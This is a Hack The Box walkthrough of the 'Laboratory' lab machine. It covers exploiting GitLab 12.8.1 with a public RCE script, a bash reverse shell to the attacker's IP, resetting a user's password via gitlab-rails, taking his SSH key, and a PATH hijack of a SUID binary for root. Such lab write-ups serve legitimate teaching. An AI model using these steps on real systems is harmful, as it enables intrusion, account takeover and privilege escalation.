Hack The Box - Laboratory Walkthrough without Metasploit

Linux Easy Box where we will have to dig into GitLab and gitlab-rails ending with some path hijacking, but first, let's enumerate !

Laboratory

Enumeration

Let's start by running nmapAutomator on our target:

nmapAutomator 10.10.10.216 All

Our basic scan returns the following:

Nmap Scan

Ports

We have the following ports open

22

This is the SSH (Secure Shell) port, we might be able to use it later to log in if we find any valid username and its password or a valid key.

80

HTTP port that redirects to HTTPS one (443) on the Nmap scan we can see that we have discovered laboratory.htb and a DNS git.laboratory.htb we add both to our /etc/hosts.

/etc/hosts entry

We can also discover the DNS with gobuster

gobuster dns -d laboratory.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 40

Gobuster DNS fuzz

443

This port is related to HTTPS, and it's the one we will access while trying to go to https://laboratory.htb so let's try to see if there's anything interesting:

Web

After some enumeration on the web page, we couldn't find much of interest so let's go to https://git.laboratory.htb here we will see a GitLab Community Edition running, and we can Register

GitLab

Trying to register a GitLab account

We must use the email domain of laboratory in order to be able to successfully register:

Using the correct Email domain

And once we click on Register we are in as our new user evil

Logged in Laboratory GitLab

Looking through the page we can enumerate the GitLab version quite easily, we go to Help and it'll appear:

GitLab Version 12.8.1

Searching for possible vulnerabilities on this version we found this report on HackerOne:

GitLab disclosed on HackerOne: Arbitrary file read via the...HackerOne

Arbitrary file read via UploadsRewriter

That leads us to this git repository:

GitHub - dotPY-hax/gitlab_RCE: RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 and LFI for old gitlab versions 10.4 - 12.8.1GitHub

gitlab_RCE

Let's clone the repository and inspect the python code!

git clone https://github.com/dotPY-hax/gitlab_RCE

We have to modify the script since this GitLab has restricted email domains, and also we change the port on where we will be listening:

Script modification

We prepare a netcat listener on port 9009:

nc -nvlp 9009

Now we can use the script:

python3 gitlab_rce.py https://git.laboratory.htb <our-ip>

We have to choose the option 2 since we want RCE and our version is 12.8.1, the script will stop and ask us if we already have a listener (how nice). We can also see what it is doing:

• Registering user hcbh4toQHD:IWTygssOAM

• Creating project by8giL18px

• Creating project qQfLhudoho

• Creating issue gggHd8VkFn for project by8giL18px

• Moving issue from by8giL18px to qQfLhudoho

• Grabbing file secrets.yml

• Deploying payload

• Delete user hcbh4toQHD

Gitlab Rce

The shell really is unstable, whenever we press enter it fades:

Unstable Shell

As soon as we get in we start another listener and the first command we type in is another reverse to make it a bit more stable:

/bin/bash -c 'bash -i >& /dev/tcp/<Our-IP>/<Port> 0>&1'

Reverse Shell

On our other shell we grab the incoming connection:

Stable Reverse

We are in as git user, enumerating we will find out that we are inside a Docker container:

.dockerenv

Privilege Escalation

Gitlab-rails

We are inside a container but we cannot escape yet, although we see that we have gitlab-rails: ~/gitlab-rails/working, searching about gitlab-rails we found two interesting pages:

How do I change my profile to Admin?GitLab Forum

How to change email address via gitlab-rails (avoid email reconfirmation)Stack Overflow

Both links pointing to how change or look users with gitlab-rails console.

First we set the environment to production:

gitlab-rails console -e production

Production Environment

Now we can find users by id, we load the first user on the variable user

user = User.find_by(id: 1)

Dexter

Let's modify a bit the user

• user.password --> set a new password

• user.password_confirmation --> confirm new password

• user.save! --> save new configuration

New Dexter password

Let's try to log in GitLab with dexter and our new password evilpass

Impersonating Dexter

Once we are logged in we can see there are two repositories:

Dexter Repositories

If we enter on SecureDocker project we will find an interesting folder:

Dexter folder

Inside that folder there is an even more interesting one!

SSH folder

Inside .ssh we have the id_rsa key that will allow us to log in as Dexter

id_rsa

We copy that id_rsa into a file in our box and chmod 600 it in order to be able to use it with ssh to log in:

chmod 600 dexterssh
ssh -i dexterssh dexter@10.10.10.216

In as Dexter

At this point we can grab our user hash, once we do it lets enumerate and try to escalate privileges

Dexter Privilege Escalation

We get suid3num.py to the box to see if there are binaries with SUID:

GitHub - Anon-Exploiter/SUID3NUM: A standalone python script which utilizes python's built-in modules to enumerate SUID binaries, separate default binaries from custom binaries, cross-match those with bins in GTFO Bin's repository & auto-exploit those, all with colors! ( ͡~ ͜ʖ ͡°)GitHub

Suid3num.py

Set a SimpleHTTPServer on our box:

python -m SimpleHTTPServer

On Laboratory shell as dexter grab the script and execute it:

wget <Our-IP>/suidnum.py
chmod +x suid3num.py
python3 suid3num.py

Getting Suid3num.py to the box

We can see there is a Custom SUID Binary

Inspecting the binary with ltrace:

It's setting uid and gid to 0 (root) and then using chmod without full path, we can hijack that to become root:

chmod without full path as root

Hijacking chmod

Since it's using chmod without the full path, it will be looking through all the directories in our $PATH variable and will use the first chmod that it finds. Knowing that we will prepend to our PATH /tmp/.folder and there we will create a file called chmod on where we will put /bin/bash and make it executable:

export PATH=/tmp/.folder:$PATH
echo "/bin/bash" > chmod
chmod +x chmod

Hijacking chmod

Pwnd

If we execute the SUID binary now:

/usr/local/bin/docker-security

We are root